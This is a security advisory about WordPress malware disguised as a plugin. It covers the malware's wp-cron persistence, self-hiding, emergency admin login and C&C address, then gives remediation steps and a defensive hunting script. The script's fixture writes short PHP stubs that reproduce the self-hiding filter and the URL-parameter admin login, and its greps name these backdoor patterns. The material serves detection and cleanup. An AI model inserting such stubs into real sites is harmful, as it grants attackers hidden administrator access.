May 1, 2025
Severity
High
Analysis Summary
A newly identified malware variant targets WordPress websites by posing as a legitimate security plugin. It ships under innocuous filenames such as WP-antymalwary-bot.php or wp-performance-booster.php to mislead site administrators. Behind that facade the malware provides remote code execution, unauthorized administrator access, and a JavaScript injection routine that lets the attackers serve unwanted advertisements and take full control of the compromised site.
Its persistence mechanism is one of its most alarming aspects. It modifies the WordPress core file wp-cron.php so that the malware is recreated and reactivated if an administrator removes it, which makes a simple delete-the-plugin cleanup ineffective. The malware also checks in with a command-and-control (C&C) server hosted in Cyprus every minute, sending the infected site's URL and a timestamp, so the operators keep a current inventory of compromised sites and can act on them in bulk.
Researchers discovered the malware during a routine site cleanup on January 22, 2025 and noted its technical sophistication and the deliberate effort to mimic a legitimate plugin's structure. They developed detection signatures quickly, pushing them to premium customers by January 24, while free users are scheduled to receive them by May 23, 2025. The malware also evades detection in the WordPress plugin dashboard: it hooks the all_plugins filter with add_filter('all_plugins', ...) and unsets its own entry from the returned array, so the plugin never appears in the installed-plugins list.
The malware further contains an "emergency login" routine. When a request carries a predefined password in a URL parameter, the code looks up the first administrator account and sets an authentication cookie for it, granting full access to the admin dashboard without passing through the normal login form or triggering typical login alerts. The combination of persistence, stealth, minute-by-minute C&C check-ins, and a built-in administrator backdoor marks a dangerous evolution in WordPress-targeted threats and a serious risk to site integrity and administrator trust.
Impact
- File Manipulation
- Code Execution
- Unauthorized Access
Indicators of Compromise
IP
45.61.136.85
Affected Vendors
- WordPress
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Immediately scan the site with up-to-date malware detection tools such as Wordfence (with premium signatures if available) to identify and quarantine malicious files such as WP-antymalwary-bot.php and wp-performance-booster.php.
- Manually inspect the file system, especially wp-content/plugins/, wp-cron.php, and any recently modified core files, for unauthorized changes or unfamiliar code.
- Delete all traces of the malicious plugin, including any suspicious files and injected JavaScript. Restore wp-cron.php to its original state, preferably by replacing it with the copy from a clean WordPress release of the same version rather than editing it by hand.
- After cleanup, remove the web server's write access to core files (wp-cron.php, wp-config.php, etc.) so the cron-based reinfection mechanism cannot rewrite them.
- Update all plugins, themes, and WordPress core to the latest versions to patch known vulnerabilities that may have been exploited for initial access.
- Change all administrator passwords immediately, especially if the emergency login feature was exploited. Audit all user accounts and remove any unknown or suspicious admin users.
- Implement a Web Application Firewall (WAF) to block malicious inbound traffic, and add egress filtering on the web server so the malware cannot reach its C&C server; a WAF alone does not stop outbound connections, so block the listed IP at the host or network firewall as well.
- Enable security logging and monitoring to detect future anomalies in login behavior, file changes, and plugin activity.
- Regularly back up your site and store backups securely offline or in a trusted cloud storage solution to aid in recovery from future compromises.
- Consider using security plugins that support file integrity monitoring, two-factor authentication, and real-time alerts for suspicious behavior.
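The indicators described in the analysis summary (the all_plugins filter used to hide the plugin, the URL-parameter emergency login that calls the auth-cookie routine, the tampered wp-cron.php, and the hard-coded C&C address) and the manual inspection steps above can be combined into one hunting script. The following is an added example written for this advisory; it is not the vendor's or Wordfence's tooling. It assumes a standard WordPress layout (wp-content/plugins under the docroot, wp-cron.php at the docroot), the grep patterns are heuristics of my own rather than published signatures, and the fixture tree it builds to run against is constructed for the example (harmless stubs that mimic the described indicators, not live malware).

```shell
#!/bin/sh
# Added example: hunt a WordPress docroot for the indicators this advisory
# describes. Heuristic greps written for this page; not the vendor's tooling.
# Usage: hunt_wp_backdoor /var/www/html   (exit 0 = nothing found, 1 = findings)

C2_IP='45.61.136.85'   # C&C address listed under Indicators of Compromise

hunt_wp_backdoor() {
    root="$1"
    hits=$(
        # 1. Known malicious file names, anywhere under the docroot.
        find "$root" -type f \( -name 'WP-antymalwary-bot.php' -o -name 'wp-performance-booster.php' \) \
            2>/dev/null | sed 's/^/FILE        /'

        # 2. Plugins that hook the all_plugins filter; the malware uses it to
        #    unset its own entry so it never shows in the plugin dashboard.
        grep -rlE "add_filter\( *['\"]all_plugins" "$root/wp-content/plugins" 2>/dev/null \
            | sed 's/^/HIDDEN      /'

        # 3. Emergency-login pattern: wp_set_auth_cookie() in the same file as a
        #    request parameter. Legitimate magic-link plugins do this too, so
        #    these hits need a manual read before acting on them.
        grep -rlF 'wp_set_auth_cookie' "$root/wp-content/plugins" 2>/dev/null \
            | while IFS= read -r f; do
                if grep -qE '\$_(GET|REQUEST)\[' "$f"; then echo "AUTHCOOKIE  $f"; fi
              done

        # 4. wp-cron.php tampering: the stock core file never writes files,
        #    activates plugins, or decodes payloads.
        grep -lE 'file_put_contents|activate_plugin|base64_decode|eval\(' "$root/wp-cron.php" 2>/dev/null \
            | sed 's/^/CRON        /'

        # 5. The C&C address hard-coded anywhere under the docroot.
        grep -rlF "$C2_IP" "$root" 2>/dev/null | sed 's/^/C2          /'
    )
    [ -n "$hits" ] || return 0
    printf '%s\n' "$hits"
    return 1
}

# Constructed fixture: a throwaway WordPress-like tree carrying each indicator
# as a harmless stub (the strings mimic the advisory's description; nothing
# here is live malware). It lets the hunter run offline.
make_sample_tree() {
    d="$1"
    mkdir -p "$d/wp-content/plugins/wp-performance-booster" "$d/wp-content/plugins/akismet"
    cat > "$d/wp-content/plugins/wp-performance-booster/wp-performance-booster.php" <<'EOF'
<?php
/* constructed stub: hide this plugin from the dashboard list */
add_filter('all_plugins', function ($p) { unset($p[plugin_basename(__FILE__)]); return $p; });
/* constructed stub: emergency login keyed on a URL parameter */
if (isset($_GET['emergency_login'])) { wp_set_auth_cookie(1, true); }
$c2 = 'http://45.61.136.85/';
EOF
    printf '<?php\n/* benign plugin stub */\n' > "$d/wp-content/plugins/akismet/akismet.php"
    printf '<?php\n/* constructed stub of a tampered core file */\nfile_put_contents(WP_PLUGIN_DIR . "/x.php", $payload);\n' \
        > "$d/wp-cron.php"
}

# Demo run against the fixture; point hunt_wp_backdoor at a real docroot instead.
demo=$(mktemp -d)
make_sample_tree "$demo"
hunt_wp_backdoor "$demo" || echo "findings above: treat the site as compromised"
rm -rf "$demo"
```

Each finding is prefixed with the check that produced it, so the output can be fed straight into the cleanup steps above: FILE and CRON hits are removed or restored from a clean release, HIDDEN and AUTHCOOKIE hits are read by hand (a plugin that hides itself from its own administrators has no legitimate reason to), and a C2 hit means the site was talking to the listed address and every administrator credential should be rotated.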